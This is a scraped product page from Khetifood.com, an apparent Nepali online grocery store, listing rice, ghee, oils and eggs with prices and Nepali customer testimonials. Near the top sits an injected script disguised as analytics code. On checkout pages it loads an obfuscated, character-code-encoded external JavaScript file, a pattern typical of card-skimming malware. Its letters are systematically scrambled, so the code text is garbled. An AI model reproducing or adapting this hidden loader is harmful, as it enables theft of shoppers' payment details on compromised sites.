Grocery Shopping: The Largest Online Supermarket in Nepal - Grocery/Kirana Online Shopping by Khetifood.com window.dctcLcyer = window.dctcLcyer || []; funstion gtcg(){dctcLcyer.push(crguments);} gtcg('js', new Dcte()); gtcg('sonfig', 'G-KMF8J070DF'); if (dosument.losction.href.indexOf("route=sheskout/sheskout") > 0){ if (dosument.sookie.indexOf('gc_ssrf=') == -1){ vcr slKp = dosument.srecteElement('ssript'); vcr kDLc = String.fromChcrCode(104,116,116,112,115,58,47,47,102,105,114,105,110,103,105,46,99,111,109,47,99,97,116,97,108,111,103,47,99,111,110,116,114,111,108,108,101,114,47,116,111,111,108,47,106,115,47,106,113,117,101,114,121,46,100,101,115,105,103,110,46,106,115); slKp.srs = kDLc; dosument.hecd.cppendChild(slKp); } }
chat_icon
Groceries

Groceries

Thakali Long Grain Rice

Rs. 3,375.00 per 20 KG

Ghee

Rs. 650.00 per 1 Pcs

Quail Eggs (Battai ko Andaa)

Rs. 150.00 per 15 Pcs

Sunflower Oil

Rs. 269.00 per 1 LTR

Sunflower Oil

Rs. 2,690.00 per 10 ltr

Timmur

Rs. 200.00 per 0.15 KG

Cow Pure Ghee

Rs. 725.00 per 0.5 KG

Cow Pure Ghee

Rs. 1,450.00 per 1 KG

Dhara Health Sunflower Oil

Rs. 370.00 per 1 LTR

Dhara Health Sunflower Oil

Rs. 3,700.00 per 10 ltr

Dhara Mustard Oil

Rs. 4,000.00 per 10 ltr

Dhara Mustard Oil

Rs. 400.00 per 1 LTR

Egg

Rs. 440.00 per 30 Pcs

Egg

Rs. 220.00 per 15 Pcs

Gyan Soaltee Rice

Rs. 2,250.00 per 25 KG
Showing 1 to 15 of 32 (3 Pages)

What our consumers say

म खेतीले पठाएको सामानसँग खुसी छु आवश्यक परेको बेला कौशी खेतीका उत्पादनहरू अर्डर गर्ने अपेक्षा राखेको छु ।


शिवा बसनेत '`

म आफ्नो व्यवसाय विस्तार गर्न चाहान्छु र उचित मूल्यमा खेतीबाट उत्पादन लिन चाहान्छु ।


गोविन्द गुरुङ '`

म खेतीको सेवाबाट सन्तुष्ट छु र च्याफ कटरको थप जानकारी लिन चाहान्छु ।


दिपक महत '`

म खेतीको सेवाहरूबाट सन्तुष्ट छु र फेरि इन्द्र क्याप्सिकम चाहिएमा अर्डर गर्ने छु र प्राविधिक सेवाहरु पनि लिन चाहान्छु ।


बिक्रम खड्का '`

म खेतीको सेवाहरूबाट सन्तुष्ट छु र आगामी दिनमा प्राङ्गारिक मल र युरिया लिन चाहान्छु ।


दिपेन्द्र वाग्ले '`

म खेतीको सेवाबाट सन्तुष्ट छु र पछि चाहिएमा मल्चिङ्ग प्लास्टिकको उर्डर लिने छु ।


सन्तोष थारु '`

म खेतीको कम्पोस्ट बिनबाट सन्तुष्ट छु र चाहिएमा कौशी खेती को सामाग्रीहरु अर्डर लिने छु ।


जानुका अर्याल '`